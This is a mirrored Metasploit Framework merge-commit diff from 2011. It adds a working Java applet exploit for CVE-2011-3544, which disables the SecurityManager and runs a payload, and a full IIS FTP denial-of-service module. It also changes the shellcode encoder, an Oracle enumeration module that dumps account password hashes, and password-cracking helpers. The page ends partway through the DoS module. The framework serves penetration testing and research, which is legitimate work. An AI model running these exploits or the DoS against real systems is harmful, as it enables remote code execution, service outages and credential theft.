infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:rapid7/metasploit-framework into fastlib 

Conflicts:
	modules/auxiliary/scanner/http/axis_login.rb
	modules/exploits/multi/http/axis2_deployer.rb
	modules/post/multi/gather/thunderbird_creds.rb
	modules/post/windows/gather/credentials/imvu.rb
	msfopcode
unstable
HD Moore 2011-12-03 14:07:09 -06:00
parent 2d320b1828 f5528ffe88
commit 27974c4c27
111 changed files with 2425 additions and 888 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/cve-2011-3544/Exploit.class Normal file
View File

Binary file not shown.

8
external/pcaprub/pcaprub.c vendored
View File

@ -30,6 +30,14 @@
#define DLT_AIRONET_HEADER 120
#endif
#if !defined(PCAP_NETMASK_UNKNOWN)
/*
* Value to pass to pcap_compile() as the netmask if you don't know what
* the netmask is.
*/
#define PCAP_NETMASK_UNKNOWN 0xffffffff
#endif
static VALUE rb_cPcap;
#define PCAPRUB_VERSION "0.9-dev"

55
external/source/exploits/CVE-2011-3544/Exploit.java vendored Normal file
View File

@ -0,0 +1,55 @@
/*
* Oracle Java Applet Rhino Script Engine Remote Code Execution
* CVE-2011-3544
* ZDI-11-305
*
* This vulnerability is due to the way Rhino error objects are handled. Normally the script engine
* has to ensure untrusted code not being allowed to perform, but a malicious attacker can actually
* bypass this by creating an error object (which isn't checked by Rhino Script Engine), with a
* custom 'toString()' method to allow code being run with full privileges. This also allows the
* attacker to disable Java SecurityManager, and then run abitrary code.
*
* Ref:
* http://schierlm.users.sourceforge.net/CVE-2011-3544.html
*/
import java.applet.Applet;
import javax.script.*;
import javax.swing.JList;
import metasploit.Payload;
public class Exploit extends Applet {
public void init() {
try {
ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
b.put("applet", this);
// Disable SecurityManager, and then run the payload
// The error object isn't handled by Rhino, so the toString method
// will not be restricted by access control
Object proxy = (Object) engine.eval(
"this.toString = function() {" +
" java.lang.System.setSecurityManager(null);" +
" applet.callBack();" +
" return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
"};" +
"e = new Error();" +
"e.message = this;" +
"e", b);
JList list = new JList(new Object[] {proxy});
this.add(list);
}
catch (ScriptException e) {
e.printStackTrace();
}
}
public void callBack() {
try {
Payload.main(null);
}
catch (Exception e) {}
}
}

2
lib/msf/core/auxiliary/auth_brute.rb
View File

@ -419,6 +419,8 @@ module Auxiliary::AuthBrute
# datastore["VERBOSE"] is set to true.
#
# If :level would make the method nonsense, default to print_status.
#
# TODO: This needs to be simpler to be useful.
def print_brute(opts={})
if opts[:level] and opts[:level].to_s[/^v/]
return unless datastore["VERBOSE"]

4
lib/msf/core/auxiliary/report.rb
View File

@ -253,10 +253,10 @@ module Auxiliary::Report
ext ||= "bin"
end
fname.gsub!(/[^a-z0-9\.\_]+/i, '')
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
fname << ".#{ext}"
ltype.gsub!(/[^a-z0-9\.\_]+/i, '')
ltype.gsub!(/[^a-z0-9\.\_\-]+/i, '')
path = File.join(Msf::Config.local_directory, fname)
full_path = ::File.expand_path(path)

4
lib/msf/core/db.rb
View File

@ -981,14 +981,14 @@ class DBManager
# If duplicate usernames are okay, find by both user and password (allows
# for actual duplicates to get modified updated_at, sources, etc)
if token[0].nil? or token[0].empty?
cred = service.creds.find_or_initalize_by_user_and_ptype_and_pass(token[0] || "", ptype, token[1] || "")
cred = service.creds.find_or_initialize_by_user_and_ptype_and_pass(token[0] || "", ptype, token[1] || "")
else
cred = service.creds.find_by_user_and_ptype_and_pass(token[0] || "", ptype, token[1] || "")
unless cred
dcu = token[0].downcase
cred = service.creds.find_by_user_and_ptype_and_pass( dcu || "", ptype, token[1] || "")
unless cred
cred = service.creds.find_or_initalize_by_user_and_ptype_and_pass(token[0] || "", ptype, token[1] || "")
cred = service.creds.find_or_initialize_by_user_and_ptype_and_pass(token[0] || "", ptype, token[1] || "")
end
end
end

6
lib/msf/core/exploit/kernel_mode.rb
View File

@ -13,7 +13,7 @@ module Exploit::KernelMode
super
reqs['EncapsulationRoutine'] = Proc.new { |reqs_, raw|
encapsulate_payload(reqs_, raw)
encapsulate_kernel_payload(reqs_, raw)
}
end
@ -30,7 +30,7 @@ protected
#
# Encapsulates the supplied raw payload within a kernel-mode payload.
#
def encapsulate_payload(reqs, raw)
def encapsulate_kernel_payload(reqs, raw)
new_raw = nil
ext_opt = reqs['ExtendedOptions'] || {}
@ -63,4 +63,4 @@ protected
end
end
end

96
lib/rex/encoder/alpha2/generic.rb
View File

@ -8,6 +8,7 @@ module Alpha2
class Generic
# Note: 'A' is presumed to be accepted, but excluded from the accepted characters, because it serves as the terminator
def Generic.default_accepted_chars ; ('a' .. 'z').to_a + ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end
def Generic.gen_decoder_prefix(reg, offset)
@ -22,14 +23,6 @@ class Generic
return ''
end
def Generic.gen_base_set(ignored_max=0x0f)
# 0xf is max for XOR encodings - non-unicode
max = 0x0f
Rex::Text.shuffle_a(
[* ( (0..(max)).map { |i| i *= 0x10 } ) ]
)
end
def Generic.gen_second(block, base)
# XOR encoder for ascii - unicode uses additive
(block^base)
@ -37,58 +30,41 @@ class Generic
def Generic.encode_byte(block, badchars)
accepted_chars = default_accepted_chars.dup
# Remove bad chars from the accepted_chars list. Sadly 'A' must be
# an accepted char or we'll certainly fail at this point. This could
# be fixed later maybe with some recalculation of the encoder stubs...
# - Puss
(badchars || '').unpack('C*').map { |c| accepted_chars.delete([c].pack('C')) }
first = 0
second = 1
randbase = 0
found = nil
gen_base_set(block).each do |randbase_|
second = gen_second(block, randbase_)
next if second < 0
if accepted_chars.include?([second].pack('C'))
found = second
randbase = randbase_
break
end
badchars.each_char {|c| accepted_chars.delete(c) } if badchars
# No, not nipple.
nibble_chars = Array.new(0x10) {[]}
accepted_chars.each {|c| nibble_chars[c.unpack('C')[0] & 0x0F].push(c) }
poss_encodings = []
block_low_nibble = block & 0x0F
block_high_nibble = block >> 4
# Get list of chars suitable for expressing lower part of byte
first_chars = nibble_chars[block_low_nibble]
# Build a list of possible encodings
first_chars.each do |first_char|
first_high_nibble = first_char.unpack('C')[0] >> 4
# In the decoding process, the low nibble of the second char gets combined
# (either ADDed or XORed depending on the encoder) with the high nibble of the first char,
# and we want the high nibble of our input byte to result
second_low_nibble = gen_second(block_high_nibble, first_high_nibble) & 0x0F
# Find valid second chars for this first char and add each combination to our possible encodings
second_chars = nibble_chars[second_low_nibble]
second_chars.each {|second_char| poss_encodings.push(second_char + first_char) }
end
if not found
msg = "No valid base found for #{"0x%.2x" % block}"
if not accepted_chars.include?([second].pack('C'))
msg << ": BadChar to #{second}"
elsif second < 1
msg << ": Negative"
end
raise RuntimeError, msg
if poss_encodings.empty?
raise RuntimeError, "No encoding of #{"0x%.2X" % block} possible with limited character set"
end
if (randbase > 0xa0)
# first num must be 4
first = (randbase/0x10) + 0x40
elsif (randbase == 0x00) || (randbase == 0x10)
# first num must be 5
first = (randbase/0x10) + 0x50
else
# pick one at "random"
first = (randbase/0x10)
if (first % 2) > 0
first += 0x40
else
first += 0x50
end
end
# now add our new bytes :)
[first.to_i, second].pack('CC')
# Return a random encoding
poss_encodings[rand(poss_encodings.length)]
end
def Generic.encode(buf, reg, offset, badchars = '')
@ -97,10 +73,10 @@ class Generic
buf.each_byte {
|block|
encoded += encode_byte(block, badchars)
encoded << encode_byte(block, badchars)
}
encoded += add_terminator()
encoded << add_terminator()
return encoded
end

10
lib/rex/encoder/alpha2/unicode_mixed.rb
View File

@ -7,12 +7,6 @@ module Encoder
module Alpha2
class UnicodeMixed < Generic
def self.gen_base_set(max)
Rex::Text.shuffle_a(
[* ( (0..(max-1)).map { |i| i *= 0x10 } ) ]
)
end
def self.gen_second(block, base)
# unicode uses additive encoding
@ -20,8 +14,8 @@ class UnicodeMixed < Generic
end
def self.gen_decoder_prefix(reg, offset)
if (offset > 28)
raise "Critical: Offset is greater than 28"
if (offset > 21)
raise "Critical: Offset is greater than 21"
end
# offset untested for unicode :(

10
lib/rex/encoder/alpha2/unicode_upper.rb
View File

@ -8,12 +8,6 @@ module Alpha2
class UnicodeUpper < Generic
def self.default_accepted_chars ; ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end
def self.gen_base_set(max)
Rex::Text.shuffle_a(
[* ( (0..(max-1)).map { |i| i *= 0x10 } ) ]
)
end
def self.gen_second(block, base)
# unicode uses additive encoding
@ -21,8 +15,8 @@ class UnicodeUpper < Generic
end
def self.gen_decoder_prefix(reg, offset)
if (offset > 8)
raise "Critical: Offset is greater than 8"
if (offset > 6)
raise "Critical: Offset is greater than 6"
end
# offset untested for unicode :(

2
lib/rex/proto/smb/constants.rb
View File

@ -732,8 +732,8 @@ SMB_NTTRANS_HDR_PKT = Rex::Struct2::CStructTemplate.new(
[ 'uint32v', 'DataCount', 0 ],
[ 'uint32v', 'DataOffset', 0 ],
[ 'uint8', 'SetupCount', 0 ],
[ 'string', 'SetupData', nil, '' ],
[ 'uint16v', 'Subcommand', 0 ],
[ 'string', 'SetupData', nil, '' ],
[ 'uint16v', 'ByteCount', 0 ],
[ 'string', 'Payload', nil, '' ]
).create_restraints(

6
lib/rex/ui/text/output/stdio.rb
View File

@ -1,5 +1,9 @@
require 'rex/ui'
require 'windows_console_color_support'
begin
require 'windows_console_color_support'
rescue ::LoadError
end
module Rex
module Ui

263
modules/auxiliary/admin/oracle/oraenum.rb
View File

@ -58,7 +58,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("The versions of the Components are:")
ver.each do |v|
print_status("\t#{v.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Component Version: #{v.chomp}",
:update => :unique_data
)
end
#Saving Major Release Number for other checks
@ -70,18 +78,50 @@ class Metasploit3 < Msf::Auxiliary
begin
if vparm["audit_trail"] == "NONE"
print_status("\tDatabase Auditing is not enabled!")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Trail: Disabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Audit Trail: Disabled",
:update => :unique_data
)
else
print_status("\tDatabase Auditing is enabled!")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Trail: Enabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Audit Trail: Enabled",
:update => :unique_data
)
end
if vparm["audit_sys_operations"] == "FALSE"
print_status("\tAuditing of SYS Operations is not enabled!")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit SYS Ops: Disabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Audit SYS Ops: Disabled",
:update => :unique_data
)
else
print_status("\tAuditing of SYS Operations is enabled!")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit SYS Ops: Enabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Audit SYS Ops: Enabled",
:update => :unique_data
)
end
end
@ -93,10 +133,26 @@ class Metasploit3 < Msf::Auxiliary
if vparm["sql92_security"] == "FALSE"
print_status("\tSQL92 Security restriction on SELECT is not Enabled")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "SQL92: Disabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "SQL92: Disabled",
:update => :unique_data
)
else
print_status("\tSQL92 Security restriction on SELECT is Enabled")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "SQL92: Enabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "SQL92: Enabled",
:update => :unique_data
)
end
# check for encryption of logins on version before 10g
@ -104,10 +160,26 @@ class Metasploit3 < Msf::Auxiliary
if majorrel.join.to_i < 10
if vparm["dblink_encrypt_login"] == "FALSE"
print_status("\tLink Encryption for Logins is not Enabled")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Link Encryption: Disabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Link Encryption: Disabled",
:update => :unique_data
)
else
print_status("\tLink Encryption for Logins is Enabled")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Link Encryption: Enabled", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Link Encryption: Enabled",
:update => :unique_data
)
end
end
@ -145,7 +217,15 @@ class Metasploit3 < Msf::Auxiliary
|
lockout = prepare_exec(query)
print_status("\tCurrent Account Lockout Time is set to #{lockout[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account Lockout Time: #{lockout[0].chomp}",
:update => :unique_data
)
rescue => e
if e.to_s =~ /ORA-00942: table or view does not exist/
@ -162,7 +242,15 @@ class Metasploit3 < Msf::Auxiliary
|
failed_logins = prepare_exec(query)
print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}",
:update => :unique_data
)
rescue => e
if e.to_s =~ /ORA-00942: table or view does not exist/
@ -179,7 +267,15 @@ class Metasploit3 < Msf::Auxiliary
|
grace_time = prepare_exec(query)
print_status("\tThe Password Grace Time is set to #{grace_time[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account Password Grace Time: #{grace_time[0].chomp}",
:update => :unique_data
)
rescue => e
if e.to_s =~ /ORA-00942: table or view does not exist/
@ -196,7 +292,15 @@ class Metasploit3 < Msf::Auxiliary
|
passlife_time = prepare_exec(query)
print_status("\tThe Lifetime of Passwords is set to #{passlife_time[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Life Time: #{passlife_time[0].chomp}",
:update => :unique_data
)
rescue => e
if e.to_s =~ /ORA-00942: table or view does not exist/
@ -213,7 +317,15 @@ class Metasploit3 < Msf::Auxiliary
|
passreuse = prepare_exec(query)
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Reuse Time: #{passreuse[0].chomp}",
:update => :unique_data
)
rescue => e
if e.to_s =~ /ORA-00942: table or view does not exist/
@ -230,7 +342,15 @@ class Metasploit3 < Msf::Auxiliary
|
passreusemax = prepare_exec(query)
print_status("\tThe Maximum Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax[0].chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}",
:update => :unique_data
)
print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
rescue => e
@ -249,10 +369,26 @@ class Metasploit3 < Msf::Auxiliary
passrand = prepare_exec(query)
if passrand[0] =~ /NULL/
print_status("\tPassword Complexity is not checked")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is not being checked for new passwords", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Complexity is not being checked for new passwords",
:update => :unique_data
)
else
print_status("\tPassword Complexity is being checked")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is being checked for new passwords", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Password Complexity is being checked for new passwords",
:update => :unique_data
)
end
rescue => e
@ -276,7 +412,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Active Accounts on the System in format Username,Hash are:")
activeacc.each do |aa|
print_status("\t#{aa.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Active Account #{aa.chomp}",
:update => :unique_data
)
end
else
query = %Q|
@ -288,7 +432,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Active Accounts on the System in format Username,Password,Spare4 are:")
activeacc.each do |aa|
print_status("\t#{aa.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Active Account #{aa.chomp}",
:update => :unique_data
)
end
end
@ -309,7 +461,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Expired or Locked Accounts on the System in format Username,Hash are:")
disabledacc.each do |da|
print_status("\t#{da.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Disabled Account #{da.chomp}",
:update => :unique_data
)
end
else
query = %Q|
@ -321,7 +481,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Expired or Locked Accounts on the System in format Username,Password,Spare4 are:")
disabledacc.each do |da|
print_status("\t#{da.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Disabled Account #{da.chomp}",
:update => :unique_data
)
end
end
@ -341,7 +509,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Accounts with DBA Privilege in format Username,Hash on the System are:")
dbaacc.each do |dba|
print_status("\t#{dba.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with DBA Priv #{dba.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with DBA Priv #{dba.chomp}",
:update => :unique_data
)
end
rescue => e
@ -360,7 +536,14 @@ class Metasploit3 < Msf::Auxiliary
print_status("Accounts with Alter System Privilege on the System are:")
altersys.each do |as|
print_status("\t#{as.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with ALTER SYSTEM Priv #{as.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with ALTER SYSTEM Priv #{as.chomp}",
:update => :unique_data)
end
rescue => e
@ -379,7 +562,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Accounts with JAVA ADMIN Privilege on the System are:")
javaacc.each do |j|
print_status("\t#{j.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with JAVA ADMIN Priv #{j.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with JAVA ADMIN Priv #{j.chomp}",
:update => :unique_data
)
end
rescue => e
@ -399,7 +590,15 @@ class Metasploit3 < Msf::Auxiliary
print_status("Accounts that have CREATE LIBRARY Privilege on the System are:")
libpriv.each do |lp|
print_status("\t#{lp.chomp}")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with CREATE LIBRARY Priv #{lp.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with CREATE LIBRARY Priv #{lp.chomp}",
:update => :unique_data
)
end
rescue => e
@ -418,7 +617,15 @@ class Metasploit3 < Msf::Auxiliary
defpwd = prepare_exec(query)
defpwd.each do |dp|
print_status("\tThe account #{dp.chomp} has a default password.")
report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with Default Password #{dp.chomp}", :update => :unique_data)
report_note(
:host => datastore['RHOST'],
:proto => 'tcp',
:sname => 'TNS',
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with Default Password #{dp.chomp}",
:update => :unique_data
)
end
else
@ -445,11 +652,11 @@ class Metasploit3 < Msf::Auxiliary
:port => datastore['RPORT'],
:type => 'ORA_ENUM',
:data => "Account with Default Password #{accrcrd[0]} is #{accrcrd[1]}",
:update => :unique_data)
:update => :unique_data
)
end
end
end
end
end
end

4
modules/auxiliary/analyze/jtr_linux.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
unless myloots.nil? or myloots.empty?
myloots.each do |myloot|
begin
usf = File.open(myloot.path)
usf = File.open(myloot.path, "rb")
rescue Exception => e
print_error("Unable to read #{myloot.path} \n #{e}")
end
@ -157,7 +157,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
unless seed.empty?

2
modules/auxiliary/analyze/jtr_mssql_fast.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

2
modules/auxiliary/analyze/jtr_mysql_fast.rb
View File

@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

2
modules/auxiliary/analyze/jtr_oracle_fast.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
return seed

4
modules/auxiliary/analyze/postgres_md5_crack.rb
View File

@ -124,11 +124,11 @@ class Metasploit3 < Msf::Auxiliary
john_cracked_passwords.values {|v| seed << v }
#Grab the default John Wordlist
john = File.open(john_wordlist_path, "r")
john = File.open(john_wordlist_path, "rb")
john.each_line{|line| seed << line.chomp}
if datastore['Wordlist']
wordlist= File.open(datastore['Wordlist'], "r")
wordlist= File.open(datastore['Wordlist'], "rb")
wordlist.each_line{|line| seed << line.chomp}
end

121
modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb Normal file
View File

@ -0,0 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet
Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command
containing a wildcard. For this exploit to work in most cases, you need 1) a valid
ftp account: either read-only or write-access account 2) the "FTP Publishing" must
be configured as "manual" mode in startup type 3) there must be at least one
directory under FTP root directory. If your provided an FTP account has write-access
privilege and there is no single directory, a new directory with random name will be
created prior to sending exploit payload.
},
'Author' =>
[
'Kingcope', # Initial discovery
'Myo Soe' # Metasploit Module (http://yehg.net)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'MSB', 'MS09-053'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
],
'DisclosureDate' => 'Sep 03 2009'))
end
def run
#Attempt to crash IIS FTP
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')
res = send_cmd_data(['ls'],'')
if res.to_s =~ /\<DIR\> / then
print_status('Directory found, skipped creating a directory')
else
print_status('No single directory found')
print_status('Attempting to create a directory ...')
new_dir = Rex::Text.rand_text_alphanumeric(6)
res = send_cmd(['mkd',new_dir])
if res =~ /directory created/ then
print_status("New directory \"#{new_dir}\" was created!")
else
print_error('Write-access was denied')
print_error('Exploit failed')
disconnect
return
end
end
print_status("Sending DoS packets ...")
res = send_cmd_datax(['ls','-R */../'],' ')
disconnect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionRefused
print_error("Cannot connect. The server is not running.")
return
rescue Rex::ConnectionTimeout
print_error("Cannot connect. The connection timed out.")
return
rescue
end
#More careful way to check DOS
print_status("Checking server's status...")
begin
connect_login
disconnect
print_error("DOS attempt failed. The service is still running.")
rescue
print_good("Success! Service is down")
end
end
# Workaround: modified send_cmd_data function with short sleep time before data_disconnect call
# Bug Tracker: 4868
def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)
args[0] = "LIST"
# Set the transfer mode and connect to the remove server
return nil if not data_connect(mode)
# Our pending command should have got a connection now.
res = send_cmd(args, true, nsock)
# make sure could open port
return nil unless res =~ /^(150|125) /
# dispatch to the proper method
begin
data = self.datasocket.get_once(-1, ftp_timeout)
rescue ::EOFError
data = nil
end
select(nil,nil,nil,1)
# close data channel so command channel updates
data_disconnect
# get status of transfer
ret = nil
